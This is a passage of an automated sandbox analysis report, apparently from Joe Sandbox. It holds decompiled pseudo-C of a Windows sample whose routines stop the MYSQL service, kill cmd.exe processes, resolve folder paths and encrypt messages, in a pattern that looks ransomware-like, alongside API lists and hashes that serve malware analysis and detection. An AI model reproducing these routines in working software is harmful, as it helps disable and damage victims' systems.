                                                                                    
                                                                                    				_t9 = OpenSCManagerW(0, 0, 1);
                                                                                    				_t19 = _t9;
                                                                                    				if(_t19 != 0) {
                                                                                    					_t10 = OpenServiceW(_t19, L"MYSQL", 0x20);
                                                                                    					_t26 = _t10;
                                                                                    					if(_t26 == 0) {
                                                                                    						L12:
                                                                                    						return _t10;
                                                                                    					}
                                                                                    					if(ControlService(_t26, 1,  &_v32) == 0) {
                                                                                    						L11:
                                                                                    						_t10 = CloseServiceHandle(_t19);
                                                                                    						goto L12;
                                                                                    					}
                                                                                    					if(QueryServiceStatus(_t26,  &_v32) == 0 || _v28 == 1) {
                                                                                    						L10:
                                                                                    						CloseServiceHandle(_t26);
                                                                                    						goto L11;
                                                                                    					} else {
                                                                                    						_t16 = _v12;
                                                                                    						do {
                                                                                    							_t23 = _t16;
                                                                                    							Sleep(_v8);
                                                                                    							if(QueryServiceStatus(_t26,  &_v32) == 0) {
                                                                                    								break;
                                                                                    							}
                                                                                    							_t16 = _v12;
                                                                                    						} while (_t16 >= _t23 && _v28 != 1);
                                                                                    						goto L10;
                                                                                    					}
                                                                                    				}
                                                                                    				return _t9;
                                                                                    			}

                                                                                    APIs
                                                                                    • OpenSCManagerW.ADVAPI32(00000000,00000000,00000001), ref: 00411A1D
                                                                                    • OpenServiceW.ADVAPI32(00000000,MYSQL,00000020), ref: 00411A32
                                                                                    • ControlService.ADVAPI32(00000000,00000001,?), ref: 00411A46
                                                                                    • QueryServiceStatus.ADVAPI32(00000000,?), ref: 00411A5B
                                                                                    • Sleep.KERNEL32(?), ref: 00411A75
                                                                                    • QueryServiceStatus.ADVAPI32(00000000,?), ref: 00411A80
                                                                                    • CloseServiceHandle.ADVAPI32(00000000), ref: 00411A9E
                                                                                    • CloseServiceHandle.ADVAPI32(00000000), ref: 00411AA1
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.384651495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000002.00000002.384781279.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000002.00000002.384786115.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_400000_bE5aaTiJM0.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Service$CloseHandleOpenQueryStatus$ControlManagerSleep
                                                                                    • String ID: MYSQL
                                                                                    • API String ID: 2359367111-1651825290
                                                                                    • Opcode ID: 692faa110e64916c7c56b6385ee5ad1bce035bf71229861a57ca5c091c1d7d7f
                                                                                    • Instruction ID: 28721974f2ef8f77e49d09c1c1511d7c7b7ffc9f5d452c27f8aea73f5df61dea
                                                                                    • Opcode Fuzzy Hash: 692faa110e64916c7c56b6385ee5ad1bce035bf71229861a57ca5c091c1d7d7f
                                                                                    • Instruction Fuzzy Hash: 7F117735A01209ABDB209BD59D88FEF7FACEF45791F040122FB08D2250D728D985CAA8
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 56%
                                                                                    			E0044F26C(void* __eflags, char _a4) {
                                                                                    				char _v16;
                                                                                    				char _v24;
                                                                                    				char _v44;
                                                                                    				intOrPtr _v52;
                                                                                    				char _v76;
                                                                                    				char _v84;
                                                                                    				char _v104;
                                                                                    				void* _t50;
                                                                                    				void* _t51;
                                                                                    
                                                                                    				_t51 = _t50 - 0xc;
                                                                                    				E00430CFC( &_v16,  &_a4);
                                                                                    				_v16 = 0x4d6560;
                                                                                    				E00430ECA( &_v16, 0x508238);
                                                                                    				asm("int3");
                                                                                    				_push(_t50);
                                                                                    				E00430CFC( &_v44,  &_v24);
                                                                                    				_v44 = 0x4d6578;
                                                                                    				E00430ECA( &_v44, 0x508274);
                                                                                    				asm("int3");
                                                                                    				_push(_t51);
                                                                                    				E0044EF74( &_v76, _v52);
                                                                                    				E00430ECA( &_v76, 0x508320);
                                                                                    				asm("int3");
                                                                                    				_push(_t51 - 0xc);
                                                                                    				E00430CFC( &_v104,  &_v84);
                                                                                    				_v104 = 0x4d656c;
                                                                                    				E00430ECA( &_v104, 0x5082cc);
                                                                                    				asm("int3");
                                                                                    				return "bad function call";
                                                                                    			}

                                                                                    APIs
                                                                                    • std::exception::exception.LIBCMT ref: 0044F27F
                                                                                      • Part of subcall function 00430CFC: std::exception::_Copy_str.LIBCMT ref: 00430D15
                                                                                    • __CxxThrowException@8.LIBCMT ref: 0044F294
                                                                                      • Part of subcall function 00430ECA: RaiseException.KERNEL32(?,?,?,<yP,?,?,?,?,?,00423B9C,?,0050793C,?,00000001), ref: 00430F1F
                                                                                    • std::exception::exception.LIBCMT ref: 0044F2AD
                                                                                    • __CxxThrowException@8.LIBCMT ref: 0044F2C2
                                                                                    • std::regex_error::regex_error.LIBCPMT ref: 0044F2D4
                                                                                      • Part of subcall function 0044EF74: std::exception::exception.LIBCMT ref: 0044EF8E
                                                                                    • __CxxThrowException@8.LIBCMT ref: 0044F2E2
                                                                                    • std::exception::exception.LIBCMT ref: 0044F2FB
                                                                                    • __CxxThrowException@8.LIBCMT ref: 0044F310
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.384651495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000002.00000002.384781279.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000002.00000002.384786115.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_400000_bE5aaTiJM0.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Exception@8Throwstd::exception::exception$Copy_strExceptionRaisestd::exception::_std::regex_error::regex_error
                                                                                    • String ID: bad function call
                                                                                    • API String ID: 2464034642-3612616537
                                                                                    • Opcode ID: ed214ebb3701571be2f43069d920533da395f334550e3d3fd8b3428f3c6f404b
                                                                                    • Instruction ID: b7a33952e270e61bb8336860f47bfa26d0287e47148adb1a9e07c7a629f44a3a
                                                                                    • Opcode Fuzzy Hash: ed214ebb3701571be2f43069d920533da395f334550e3d3fd8b3428f3c6f404b
                                                                                    • Instruction Fuzzy Hash: 60110A74D0020DBBCB04FFA5D566CDDBB7CEA04348F408A67BD2497241EB78A7498B99
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 86%
                                                                                    			E00412440() {
                                                                                    				char _v524;
                                                                                    				long _v552;
                                                                                    				void* _v560;
                                                                                    				void* __ebx;
                                                                                    				void* __edi;
                                                                                    				void* __esi;
                                                                                    				int _t8;
                                                                                    				int _t11;
                                                                                    				void* _t17;
                                                                                    				void* _t18;
                                                                                    				void* _t19;
                                                                                    				void* _t21;
                                                                                    
                                                                                    				_t18 = CreateToolhelp32Snapshot(0xf, 0);
                                                                                    				_v560 = 0x22c;
                                                                                    				_push( &_v560);
                                                                                    				_t8 = Process32FirstW(_t18);
                                                                                    				_t17 = CloseHandle;
                                                                                    				if(_t8 == 0) {
                                                                                    					L7:
                                                                                    					return CloseHandle(_t18);
                                                                                    				}
                                                                                    				_push(_t19);
                                                                                    				do {
                                                                                    					_t11 = E00420235(_t17, _t18, _t19,  &_v524, L"cmd.exe");
                                                                                    					_t21 = _t21 + 8;
                                                                                    					if(_t11 == 0) {
                                                                                    						_t19 = OpenProcess(1, _t11, _v552);
                                                                                    						if(_t19 != 0) {
                                                                                    							TerminateProcess(_t19, 9);
                                                                                    							CloseHandle(_t19);
                                                                                    						}
                                                                                    					}
                                                                                    				} while (Process32NextW(_t18,  &_v560) != 0);
                                                                                    				goto L7;
                                                                                    			}

                                                                                    APIs
                                                                                    • CreateToolhelp32Snapshot.KERNEL32(0000000F,00000000), ref: 0041244F
                                                                                    • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00412469
                                                                                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 004124A1
                                                                                    • TerminateProcess.KERNEL32(00000000,00000009), ref: 004124B0
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 004124B7
                                                                                    • Process32NextW.KERNEL32(00000000,0000022C), ref: 004124C1
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 004124CD
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.384651495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000002.00000002.384781279.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000002.00000002.384786115.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_400000_bE5aaTiJM0.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
                                                                                    • String ID: cmd.exe
                                                                                    • API String ID: 2696918072-723907552
                                                                                    • Opcode ID: 577ed8ed9705958fd2e422ac99cb6a94193351d2856dfe9262a659f2a85694a3
                                                                                    • Instruction ID: b239e8364e8e77cb7af63d5752a1eab109cf3eb7ce5fcb3b526656d556a9da04
                                                                                    • Opcode Fuzzy Hash: 577ed8ed9705958fd2e422ac99cb6a94193351d2856dfe9262a659f2a85694a3
                                                                                    • Instruction Fuzzy Hash: ED0192355012157BE7206BA1AC89FAF766CEB08714F0400A2FD08D2141EA6489408EB9
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 83%
                                                                                    			E0040F310(void* __edi, void* __esi, char _a4, signed int _a20, intOrPtr _a24) {
                                                                                    				signed int _v8;
                                                                                    				intOrPtr _v16;
                                                                                    				char _v20;
                                                                                    				intOrPtr _v28;
                                                                                    				char _v32;
                                                                                    				intOrPtr _v36;
                                                                                    				signed int _v40;
                                                                                    				short _v56;
                                                                                    				intOrPtr _v60;
                                                                                    				signed int _v64;
                                                                                    				short _v80;
                                                                                    				intOrPtr _v84;
                                                                                    				signed int _v88;
                                                                                    				char _v104;
                                                                                    				void* __ebx;
                                                                                    				void* __ebp;
                                                                                    				_Unknown_base(*)()* _t147;
                                                                                    				void* _t169;
                                                                                    				void* _t173;
                                                                                    				void* _t177;
                                                                                    				void* _t195;
                                                                                    				void* _t203;
                                                                                    				struct HINSTANCE__* _t221;
                                                                                    				signed int _t222;
                                                                                    				void* _t233;
                                                                                    				void* _t235;
                                                                                    				signed int _t238;
                                                                                    				short _t260;
                                                                                    				char _t261;
                                                                                    				intOrPtr _t266;
                                                                                    				void* _t267;
                                                                                    				void* _t268;
                                                                                    				void* _t269;
                                                                                    
                                                                                    				_push(0xffffffff);
                                                                                    				_push(0x4caa98);
                                                                                    				_push( *[fs:0x0]);
                                                                                    				 *[fs:0x0] = _t266;
                                                                                    				_t267 = _t266 - 0x58;
                                                                                    				_v8 = 0;
                                                                                    				_t221 = LoadLibraryW(L"Shell32.dll");
                                                                                    				if(_t221 != 0) {
                                                                                    					_t147 = GetProcAddress(_t221, "SHGetFolderPathW");
                                                                                    					_t259 = _t147;
                                                                                    					E00413A90(_t221,  &_v32, __edi, 0x400);
                                                                                    					_v8 = 1;
                                                                                    					_t254 = _v32;
                                                                                    					 *_t147(0, 0x28, 0, 0, _v32, __edi, __esi);
                                                                                    					_push(_v20);
                                                                                    					_v36 = 7;
                                                                                    					_v40 = 0;
                                                                                    					_v56 = 0;
                                                                                    					E00418400( &_v56, _v32, _v28);
                                                                                    					_v8 = 2;
                                                                                    					_push(1);
                                                                                    					_v84 = 7;
                                                                                    					_v88 = 0;
                                                                                    					_v104 = 0;
                                                                                    					E00415C10(_t221,  &_v104, _t254, _t147, "\\");
                                                                                    					_v8 = 3;
                                                                                    					_push(1);
                                                                                    					_v60 = 7;
                                                                                    					_v64 = 0;
                                                                                    					_v80 = 0;
                                                                                    					E00415C10(_t221,  &_v80, _t254, _t147, "/");
                                                                                    					_v8 = 4;
                                                                                    					E0040F2B0( &_v56,  &_v80,  &_v104);
                                                                                    					_t268 = _t267 + 4;
                                                                                    					if(_v60 >= 8) {
                                                                                    						L00422587(_v80);
                                                                                    						_t268 = _t268 + 4;
                                                                                    					}
                                                                                    					_v8 = 2;
                                                                                    					_v60 = 7;
                                                                                    					_v64 = 0;
                                                                                    					_v80 = 0;
                                                                                    					if(_v84 >= 8) {
                                                                                    						L00422587(_v104);
                                                                                    						_t268 = _t268 + 4;
                                                                                    					}
                                                                                    					_push(1);
                                                                                    					_v84 = 7;
                                                                                    					_v88 = 0;
                                                                                    					_v104 = 0;
                                                                                    					E00415C10(_t221,  &_v104, _t254, _t259, "\\");
                                                                                    					_v8 = 5;
                                                                                    					_push(1);
                                                                                    					_v60 = 7;
                                                                                    					_v64 = 0;
                                                                                    					_v80 = 0;
                                                                                    					E00415C10(_t221,  &_v80, _t254, _t259, "/");
                                                                                    					_v8 = 6;
                                                                                    					E0040F2B0( &_a4,  &_v80,  &_v104);
                                                                                    					_t269 = _t268 + 4;
                                                                                    					if(_v60 >= 8) {
                                                                                    						L00422587(_v80);
                                                                                    						_t269 = _t269 + 4;
                                                                                    					}
                                                                                    					_v8 = 2;
                                                                                    					_v60 = 7;
                                                                                    					_v64 = 0;
                                                                                    					_v80 = 0;
                                                                                    					if(_v84 >= 8) {
                                                                                    						L00422587(_v104);
                                                                                    						_t269 = _t269 + 4;
                                                                                    					}
                                                                                    					_t260 = _v56;
                                                                                    					_t167 =  >=  ? _t260 :  &_v56;
                                                                                    					_t233 =  >=  ? _t260 :  &_v56;
                                                                                    					_v20 =  >=  ? _t260 :  &_v56;
                                                                                    					_t250 =  >=  ? _t260 :  &_v56;
                                                                                    					_t169 = _t233 + _v40 * 2;
                                                                                    					__eflags = ( >=  ? _t260 :  &_v56) - _t169;
                                                                                    					if(( >=  ? _t260 :  &_v56) != _t169) {
                                                                                    						_push(_t233);
                                                                                    						E00418380( &_v20, _t250, _t169, _v20);
                                                                                    						_t269 = _t269 + 0xc;
                                                                                    					}
                                                                                    					_t261 = _a4;
                                                                                    					_t171 =  >=  ? _t261 :  &_a4;
                                                                                    					_t235 =  >=  ? _t261 :  &_a4;
                                                                                    					_v20 =  >=  ? _t261 :  &_a4;
                                                                                    					_t252 =  >=  ? _t261 :  &_a4;
                                                                                    					_t173 = _t235 + _a20 * 2;
                                                                                    					__eflags = ( >=  ? _t261 :  &_a4) - _t173;
                                                                                    					if(( >=  ? _t261 :  &_a4) != _t173) {
                                                                                    						_push(_t235);
                                                                                    						E00418380( &_v20, _t252, _t173, _v20);
                                                                                    						_t269 = _t269 + 0xc;
                                                                                    					}
                                                                                    					_t267 = _t269 - 8;
                                                                                    					_v20 = 0x5c;
                                                                                    					if(E00414D40( &_v56,  &_v20) != 0xffffffff) {
                                                                                    						_t177 = E00413520( &_v56,  &_v104, 0, _t175);
                                                                                    						_t262 = _t177;
                                                                                    						if( &_v56 != _t177) {
                                                                                    							if(_v36 >= 8) {
                                                                                    								L00422587(_v56);
                                                                                    								_t267 = _t267 + 4;
                                                                                    							}
                                                                                    							_v36 = 7;
                                                                                    							_v40 = 0;
                                                                                    							_v56 = 0;
                                                                                    							E004145A0( &_v56, _t262);
                                                                                    						}
                                                                                    						if(_v84 >= 8) {
                                                                                    							L00422587(_v104);
                                                                                    							_t267 = _t267 + 4;
                                                                                    						}
                                                                                    						_t238 = _v40;
                                                                                    						_t180 =  >=  ? _v56 :  &_v56;
                                                                                    						if( *((short*)(( >=  ? _v56 :  &_v56) + _t238 * 2 - 2)) == 0x5c) {
                                                                                    							_t97 = _t238 - 1; // -1
                                                                                    							_t203 = E00413520( &_v56,  &_v104, 0, _t97);
                                                                                    							_t265 = _t203;
                                                                                    							if( &_v56 != _t203) {
                                                                                    								if(_v36 >= 8) {
                                                                                    									L00422587(_v56);
                                                                                    									_t267 = _t267 + 4;
                                                                                    								}
                                                                                    								_v36 = 7;
                                                                                    								_v40 = 0;
                                                                                    								_v56 = 0;
                                                                                    								E004145A0( &_v56, _t265);
                                                                                    							}
                                                                                    							if(_v84 >= 8) {
                                                                                    								L00422587(_v104);
                                                                                    								_t267 = _t267 + 4;
                                                                                    							}
                                                                                    						}
                                                                                    						_t239 = _a20;
                                                                                    						_t182 =  >=  ? _a4 :  &_a4;
                                                                                    						if( *((short*)(( >=  ? _a4 :  &_a4) + _a20 * 2 - 2)) == 0x5c) {
                                                                                    							_t239 =  &_a4;
                                                                                    							_t195 = E00413520( &_a4,  &_v104, 0,  &_a4 - 1);
                                                                                    							_t264 = _t195;
                                                                                    							if( &_a4 != _t195) {
                                                                                    								if(_a24 >= 8) {
                                                                                    									L00422587(_a4);
                                                                                    									_t267 = _t267 + 4;
                                                                                    								}
                                                                                    								_a24 = 7;
                                                                                    								_t239 =  &_a4;
                                                                                    								_a20 = 0;
                                                                                    								_a4 = 0;
                                                                                    								E004145A0( &_a4, _t264);
                                                                                    							}
                                                                                    							if(_v84 >= 8) {
                                                                                    								L00422587(_v104);
                                                                                    								_t267 = _t267 + 4;
                                                                                    							}
                                                                                    						}
                                                                                    						FreeLibrary(_t221);
                                                                                    						_t185 =  >=  ? _a4 :  &_a4;
                                                                                    						_t222 = _t221 & 0xffffff00 | E00417F00( &_v56, _t239, _v40,  >=  ? _a4 :  &_a4, _a20) == 0x00000000;
                                                                                    					} else {
                                                                                    						FreeLibrary(_t221);
                                                                                    						_t222 = 0;
                                                                                    					}
                                                                                    					if(_v36 >= 8) {
                                                                                    						L00422587(_v56);
                                                                                    						_t267 = _t267 + 4;
                                                                                    					}
                                                                                    					_v36 = 7;
                                                                                    					_v56 = 0;
                                                                                    					_t188 = _v32;
                                                                                    					_v40 = 0;
                                                                                    					if(_v32 != 0) {
                                                                                    						L00422587(_t188);
                                                                                    						_t267 = _t267 + 4;
                                                                                    					}
                                                                                    					goto L41;
                                                                                    				} else {
                                                                                    					_t222 = 0;
                                                                                    					L41:
                                                                                    					if(_a24 >= 8) {
                                                                                    						L00422587(_a4);
                                                                                    					}
                                                                                    					 *[fs:0x0] = _v16;
                                                                                    					return _t222;
                                                                                    				}
                                                                                    			}





































                                                                                    APIs
                                                                                    • LoadLibraryW.KERNEL32(Shell32.dll), ref: 0040F338
                                                                                    • GetProcAddress.KERNEL32(00000000,SHGetFolderPathW), ref: 0040F353
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.384651495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000002.00000002.384781279.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000002.00000002.384786115.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_400000_bE5aaTiJM0.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: AddressLibraryLoadProc
                                                                                    • String ID: SHGetFolderPathW$Shell32.dll$\
                                                                                    • API String ID: 2574300362-2555811374
                                                                                    • Opcode ID: be864d8308790b92be5507a70b6add5af3086b64f5ec129cc261dae8a5d69eb3
                                                                                    • Instruction ID: 879cb2c41796572bb27552663435674e3d239ec9c812fe4031d18dca963833e9
                                                                                    • Opcode Fuzzy Hash: be864d8308790b92be5507a70b6add5af3086b64f5ec129cc261dae8a5d69eb3
                                                                                    • Instruction Fuzzy Hash: DFC15A70D00209EBDF10DFA4DD85BDEBBB5AF14308F10443AE405B7291EB79AA59CB99
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 73%
                                                                                    			E0040CBA0(intOrPtr* __ecx, void* __eflags, char _a4, char _a20, intOrPtr _a24, char _a28, intOrPtr _a48) {
                                                                                    				char _v8;
                                                                                    				intOrPtr _v16;
                                                                                    				char _v20;
                                                                                    				intOrPtr _v24;
                                                                                    				char _v28;
                                                                                    				char _v44;
                                                                                    				intOrPtr _v48;
                                                                                    				char _v52;
                                                                                    				char _v68;
                                                                                    				intOrPtr _v72;
                                                                                    				char _v76;
                                                                                    				char _v92;
                                                                                    				intOrPtr _v96;
                                                                                    				intOrPtr* _v100;
                                                                                    				char _v1124;
                                                                                    				void* __ebx;
                                                                                    				void* __edi;
                                                                                    				void* __esi;
                                                                                    				void* __ebp;
                                                                                    				void* _t127;
                                                                                    				intOrPtr _t129;
                                                                                    				void* _t150;
                                                                                    				void* _t172;
                                                                                    				void* _t173;
                                                                                    				void* _t176;
                                                                                    				void* _t178;
                                                                                    				intOrPtr _t179;
                                                                                    				void* _t181;
                                                                                    				void* _t182;
                                                                                    				void* _t183;
                                                                                    				void* _t185;
                                                                                    				void* _t189;
                                                                                    				void* _t191;
                                                                                    
                                                                                    				_push(0xffffffff);
                                                                                    				_push(0x4ca818);
                                                                                    				_push( *[fs:0x0]);
                                                                                    				 *[fs:0x0] = _t179;
                                                                                    				_push(_t150);
                                                                                    				_push(_t172);
                                                                                    				_v100 = __ecx;
                                                                                    				_push(0xffffffff);
                                                                                    				_v8 = 1;
                                                                                    				_v72 = 0xf;
                                                                                    				_v76 = 0;
                                                                                    				_v92 = 0;
                                                                                    				E00413FF0(_t150,  &_v92,  &_a28, 0);
                                                                                    				_v8 = 2;
                                                                                    				_push(1);
                                                                                    				_v48 = 0xf;
                                                                                    				_v52 = 0;
                                                                                    				_v68 = 0;
                                                                                    				E004156D0(_t150,  &_v68, _t172, "\n");
                                                                                    				_v8 = 3;
                                                                                    				_push(3);
                                                                                    				_v24 = 0xf;
                                                                                    				_v28 = 0;
                                                                                    				_v44 = 0;
                                                                                    				E004156D0(_t150,  &_v44, _t172, "\\\\n");
                                                                                    				_v8 = 4;
                                                                                    				E0040F250( &_v92,  &_v44,  &_v68);
                                                                                    				_t181 = _t179 - 0x458 + 4;
                                                                                    				if(_v24 >= 0x10) {
                                                                                    					L00422587(_v44);
                                                                                    					_t181 = _t181 + 4;
                                                                                    				}
                                                                                    				_v8 = 2;
                                                                                    				_v24 = 0xf;
                                                                                    				_v28 = 0;
                                                                                    				_v44 = 0;
                                                                                    				if(_v48 >= 0x10) {
                                                                                    					L00422587(_v68);
                                                                                    					_t181 = _t181 + 4;
                                                                                    				}
                                                                                    				_push(1);
                                                                                    				_v48 = 0xf;
                                                                                    				_v52 = 0;
                                                                                    				_v68 = 0;
                                                                                    				E004156D0(_t150,  &_v68, _t172, " ");
                                                                                    				_v8 = 5;
                                                                                    				_push(6);
                                                                                    				_v24 = 0xf;
                                                                                    				_v28 = 0;
                                                                                    				_v44 = 0;
                                                                                    				E004156D0(_t150,  &_v44, _t172, "&#160;");
                                                                                    				_v8 = 6;
                                                                                    				E0040F250( &_v92,  &_v44,  &_v68);
                                                                                    				_t182 = _t181 + 4;
                                                                                    				if(_v24 >= 0x10) {
                                                                                    					L00422587(_v44);
                                                                                    					_t182 = _t182 + 4;
                                                                                    				}
                                                                                    				_v8 = 2;
                                                                                    				_v24 = 0xf;
                                                                                    				_v28 = 0;
                                                                                    				_v44 = 0;
                                                                                    				if(_v48 >= 0x10) {
                                                                                    					L00422587(_v68);
                                                                                    					_t182 = _t182 + 4;
                                                                                    				}
                                                                                    				_push(1);
                                                                                    				_v48 = 0xf;
                                                                                    				_v52 = 0;
                                                                                    				_v68 = 0;
                                                                                    				E004156D0(_t150,  &_v68, _t172, "/");
                                                                                    				_v8 = 7;
                                                                                    				_push(2);
                                                                                    				_v24 = 0xf;
                                                                                    				_v28 = 0;
                                                                                    				_v44 = 0;
                                                                                    				E004156D0(_t150,  &_v44, _t172, "\\/");
                                                                                    				_v8 = 8;
                                                                                    				_t171 =  &_v44;
                                                                                    				E0040F250( &_v92,  &_v44,  &_v68);
                                                                                    				_t183 = _t182 + 4;
                                                                                    				if(_v24 >= 0x10) {
                                                                                    					L00422587(_v44);
                                                                                    					_t183 = _t183 + 4;
                                                                                    				}
                                                                                    				_v24 = 0xf;
                                                                                    				_v28 = 0;
                                                                                    				_v44 = 0;
                                                                                    				if(_v48 >= 0x10) {
                                                                                    					L00422587(_v68);
                                                                                    					_t183 = _t183 + 4;
                                                                                    				}
                                                                                    				_v20 = E00451D30();
                                                                                    				E0044F960(_t150, _t171, E00452510());
                                                                                    				_t120 =  >=  ? _v92 :  &_v92;
                                                                                    				_t151 = E004524A0(_t178,  >=  ? _v92 :  &_v92, _v76);
                                                                                    				E00452ED0(_t121,  &_v20, 0, 0);
                                                                                    				_t185 = _t183 + 0x1c;
                                                                                    				if(E00450960(_t151, _t171, _v72 - 0x10) == 0) {
                                                                                    					_t176 = E00420C62(_t151, _t171, _t172, E004527A0(_t171, __eflags, _v20));
                                                                                    					_t127 = E00420C62(_t151, _t171, _t172, 0x82);
                                                                                    					__eflags = _a24 - 0x10;
                                                                                    					_t173 = _t127;
                                                                                    					_t165 =  >=  ? _a4 :  &_a4;
                                                                                    					_t129 = _a20 + 1;
                                                                                    					_push(4);
                                                                                    					_push(_v20);
                                                                                    					_push(_t176);
                                                                                    					_push( >=  ? _a4 :  &_a4);
                                                                                    					E004525F0(_t129);
                                                                                    					_t189 = _t185 + 0x20;
                                                                                    					_v96 = _t129;
                                                                                    					__eflags = _t129 - 0xffffffff;
                                                                                    					if(_t129 != 0xffffffff) {
                                                                                    						E0044F5E0(_t151);
                                                                                    						E00451A60(_t171, _t178, _v20);
                                                                                    						_t191 = _t189 + 8;
                                                                                    						 *_v100 = _v96;
                                                                                    					} else {
                                                                                    						E00451FB0(_t151, _t173);
                                                                                    						E00450670(E00450960(_t151, _t171, __eflags), _t173);
                                                                                    						_push(_t173);
                                                                                    						_push("Error encrypting message: %s\n");
                                                                                    						_push(E00420E4D() + 0x40);
                                                                                    						E00422408(_t151, _t173, _t176, __eflags);
                                                                                    						_t191 = _t189 + 0x14;
                                                                                    						_t176 = 0;
                                                                                    					}
                                                                                    				} else {
                                                                                    					E00450670(_t124,  &_v1124);
                                                                                    					_t191 = _t185 + 8;
                                                                                    					_t176 = 0;
                                                                                    				}
                                                                                    				if(_v72 >= 0x10) {
                                                                                    					L00422587(_v92);
                                                                                    					_t191 = _t191 + 4;
                                                                                    				}
                                                                                    				_v72 = 0xf;
                                                                                    				_v76 = 0;
                                                                                    				_v92 = 0;
                                                                                    				if(_a24 >= 0x10) {
                                                                                    					L00422587(_a4);
                                                                                    					_t191 = _t191 + 4;
                                                                                    				}
                                                                                    				_a24 = 0xf;
                                                                                    				_a20 = 0;
                                                                                    				_a4 = 0;
                                                                                    				if(_a48 >= 0x10) {
                                                                                    					L00422587(_a28);
                                                                                    				}
                                                                                    				 *[fs:0x0] = _v16;
                                                                                    				return _t176;
                                                                                    			}

                                                                                    0x0040ce47
                                                                                    0x0040ce4a
                                                                                    0x0040ce4d
                                                                                    0x0040ce50
                                                                                    0x0040ce82
                                                                                    0x0040ce8d
                                                                                    0x0040ce95
                                                                                    0x0040ce9b
                                                                                    0x0040ce52
                                                                                    0x0040ce52
                                                                                    0x0040ce5e
                                                                                    0x0040ce66
                                                                                    0x0040ce67
                                                                                    0x0040ce74
                                                                                    0x0040ce75
                                                                                    0x0040ce7a
                                                                                    0x0040ce7d
                                                                                    0x0040ce7d
                                                                                    0x0040cdef
                                                                                    0x0040cdf7
                                                                                    0x0040cdfc
                                                                                    0x0040cdff
                                                                                    0x0040cdff
                                                                                    0x0040cea1
                                                                                    0x0040cea6
                                                                                    0x0040ceab
                                                                                    0x0040ceab
                                                                                    0x0040ceb2
                                                                                    0x0040ceb9
                                                                                    0x0040cec0
                                                                                    0x0040cec4
                                                                                    0x0040cec9
                                                                                    0x0040cece
                                                                                    0x0040cece
                                                                                    0x0040ced5
                                                                                    0x0040cedc
                                                                                    0x0040cee3
                                                                                    0x0040cee7
                                                                                    0x0040ceec
                                                                                    0x0040cef1
                                                                                    0x0040cefb
                                                                                    0x0040cf06

                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.384651495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000002.00000002.384781279.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000002.00000002.384786115.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_400000_bE5aaTiJM0.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: _malloc$__except_handler4_fprintf
                                                                                    • String ID: &#160;$Error encrypting message: %s$\\n
                                                                                    • API String ID: 1783060780-3771355929
                                                                                    • Opcode ID: 03c951cbcffbb22e4b904cab30c58fb638dd7e4556e50294ac70ee7de3450d71
                                                                                    • Instruction ID: bc568b6946d652cfd5b4c77746d66a5f57144f99ddafb1662d710ebef24806c3
                                                                                    • Opcode Fuzzy Hash: 03c951cbcffbb22e4b904cab30c58fb638dd7e4556e50294ac70ee7de3450d71
                                                                                    • Instruction Fuzzy Hash: 10A196B1C00249EBEF10EF95DD46BDEBB75AF10308F54052DE40576282D7BA5688CBAA
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 96%
                                                                                    			E00463350(void* __ebx, void* __edx, void* __ebp, char _a4, intOrPtr* _a8) {
                                                                                    				void* __edi;
                                                                                    				intOrPtr _t12;
                                                                                    				void* _t13;
                                                                                    				char _t16;
                                                                                    				intOrPtr _t19;
                                                                                    				signed int _t22;
                                                                                    				char _t35;
                                                                                    				void* _t36;
                                                                                    				char* _t37;
